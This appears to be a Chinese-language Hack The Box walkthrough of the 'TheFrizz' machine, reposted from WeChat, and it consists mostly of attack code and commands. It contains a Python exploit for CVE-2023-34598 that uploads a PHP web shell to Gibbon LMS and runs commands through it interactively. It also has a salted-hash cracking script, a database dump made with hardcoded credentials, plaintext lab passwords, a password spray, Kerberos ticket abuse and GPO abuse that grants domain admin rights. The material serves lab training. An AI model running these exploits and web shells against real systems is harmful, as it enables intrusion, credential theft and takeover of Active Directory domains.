nmap -A -v -T4 10.10.11.60
https://github.com/maddsec/CVE-2023-34598
import requestsimport base64import timeurl = "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php"# PHP WebShell 负载php_payload = "<?php echo system($_GET['cmd']);?>"encoded_php_payload = base64.b64encode(php_payload.encode()).decode()# 可能的 WebShell 文件名shell_names = ["myshell.php", "myshell.phtml", "shell.php3", "../../myshell.php"]# gibbonPersonIDgibbonPersonID = "0000000001"def send_payload(path):""" 发送 payload,尝试上传 WebShell """payload = {"img": f"image/png;asdf,{encoded_php_payload}","path": path,"gibbonPersonID": gibbonPersonID}response = requests.post(url, data=payload)return response.status_code == 200def test_webshell(path):""" 检查 WebShell 是否可访问 """test_url = f"{url.rsplit('/', 1)[0]}/{path}?cmd=whoami"response = requests.get(test_url)if response.status_code == 200:print(f"[+] WebShell 可访问: {test_url}")print(f"[+] 执行 whoami 结果: {response.text}")return Trueelse:print(f"[-] 无法访问 WebShell: {test_url} (HTTP {response.status_code})")return Falsedef main():for path in shell_names:print(f"[+] 尝试上传 WebShell: {path}")if send_payload(path):print(f"[+] 负载成功发送,尝试访问 {path}...")time.sleep(3) # 等待服务器写入文件if test_webshell(path):print("[+] WebShell 上传成功,进入交互模式...")interact_with_shell(path)returnprint("[-] 所有路径尝试失败,WebShell 可能未上传")def interact_with_shell(path):""" 交互模式 """while True:command = input("[+] 请输入要执行的命令 (exit 退出): ")if command.lower() == "exit":breaktest_url = f"{url.rsplit('/', 1)[0]}/{path}?cmd={command}"response = requests.get(test_url)if response.status_code == 200:print(f"[+] 执行结果:n{response.text}")else:print(f"[-] 访问失败 (HTTP {response.status_code})")if __name__ == "__main__":main()
Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountNameAdministratorGuestkrbtgtf.frizzlew.lih.armM.SchoolBusd.hudsonk.franklinl.awesomet.wrightr.tennelliJ.perlsteina.perlsteinp.teresev.frizzleg.frizzlec.sandiegoc.ramonm.ramonw.Webservice
mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "USE gibbon; SELECT * FROM gibbonperson WHERE username IS NOT NULL;"gibbonPersonID title surname firstName preferredName officialName nameInCharacters gender username passwordStrong passwordStrongSalt passwordForceReset status canLogin gibbonRoleIDPrimary gibbonRoleIDAll dob email emailAlternate image_240 lastIPAddress lastTimestamp lastFailIPAddress lastFailTimestamp failCount address1 address1District address1Country address2 address2District address2Country phone1Type phone1CountryCode phone1 phone3Type phone3CountryCode phone3 phone2Type phone2CountryCode phone2 phone4Type phone4CountryCode phone4 website languageFirst languageSecond languageThird countryOfBirth birthCertificateScan ethnicity religion profession employer jobTitle emergency1Name emergency1Number1 emergency1Number2 emergency1Relationship emergency2Name emergency2Number1 emergency2Number2 emergency2Relationship gibbonHouseID studentID dateStart dateEnd gibbonSchoolYearIDClassOf lastSchool nextSchool departureReason transport transportNotes calendarFeedPersonal viewCalendarSchool viewCalendarPersonal viewCalendarSpaceBooking gibbonApplicationFormID lockerNumber vehicleRegistration personalBackground messengerLastRead privacy dayType gibbonThemeIDPersonal gibboni18nIDPersonal studentAgreements googleAPIRefreshToken microsoftAPIRefreshToken genericAPIRefreshToken receiveNotificationEmails mfaSecret mfaToken cookieConsent fields0000000001 Ms. Frizzle Fiona Fiona Fiona Frizzle Unspecified f.frizzle 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 /aACFhikmNopqrRTVz2489 N Full Y 001 001 NULL [email protected] NULL NULL ::1 2024-10-29 09:28:59 NULL NULL 0 NULL NULL NULL NULL Y Y N NULL NULL NULL NULL NULL NULL NULL Y NULL NULL NULL
import hashlibimport osfrom tqdm import tqdm# 要破解的哈希值hash_to_crack = "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03"# 用于哈希的盐值salt = "/aACFhikmNopqrRTVz2489"# 密码字典文件路径password_file_path = "/usr/share/wordlists/rockyou.txt"def hash_password(password, salt, hash_algorithm='sha256'):"""计算密码的哈希值"""hash_func = getattr(hashlib, hash_algorithm)return hash_func((salt + password).encode()).hexdigest()def main():if not os.path.exists(password_file_path):print(f"密码字典文件不存在: {password_file_path}")returnwith open(password_file_path, "r", encoding="latin-1") as f:passwords = [line.strip() for line in f]total_passwords = len(passwords)print(f"总共有 {total_passwords} 个密码需要尝试。")# 使用 tqdm 显示进度条for password in tqdm(passwords, total=total_passwords, desc="破解进度"):hashed = hash_password(password, salt)if hashed == hash_to_crack:print(f"找到密码: {password}")breakif __name__ == "__main__":main()
python3 getTGT.py -dc-ip 10.10.11.60 frizz.htb/f.frizzle:Jenni_Luvs_Magic23export KRB5CCNAME=f.frizzle.ccachessh [email protected]~/.ssh/configHost frizz.htbGSSAPIAuthentication yesGSSAPIDelegateCredentials yesPreferredAuthentications gssapi-with-micHost frizzdc.frizz.htbGSSAPIAuthentication yesGSSAPIDelegateCredentials yesPreferredAuthentications gssapi-with-mic/etc/krb5.conf[libdefaults]default_realm = FRIZZ.HTBdns_lookup_realm = falsedns_lookup_kdc = trueticket_lifetime = 24hforwardable = true[realms]FRIZZ.HTB = {kdc = frizzdc.frizz.htbadmin_server = frizzdc.frizz.htbdefault_domain = frizz.htb}[domain_realm].frizz.htb = FRIZZ.HTBfrizz.htb = FRIZZ.HTB
netexec ldap frizzdc.frizz.htb -u users.txt -p '!suBcig@MehTed!R'impacket-getTGT -dc-ip 10.10.11.60 frizz.htb/m.schoolbus:'!suBcig@MehTed!R'export KRB5CCNAME=m.schoolbus.ccachessh [email protected]
# 创建一个新的组策略对象,名称为 "ikun"New-GPO -Name "ikun"# 将新创建的 GPO 链接到指定的 OU,并启用链接New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled YesSharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName ikungpupdate /force
原文始发于微信公众号(Jiyou too beautiful):HTB-TheFrizz笔记
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论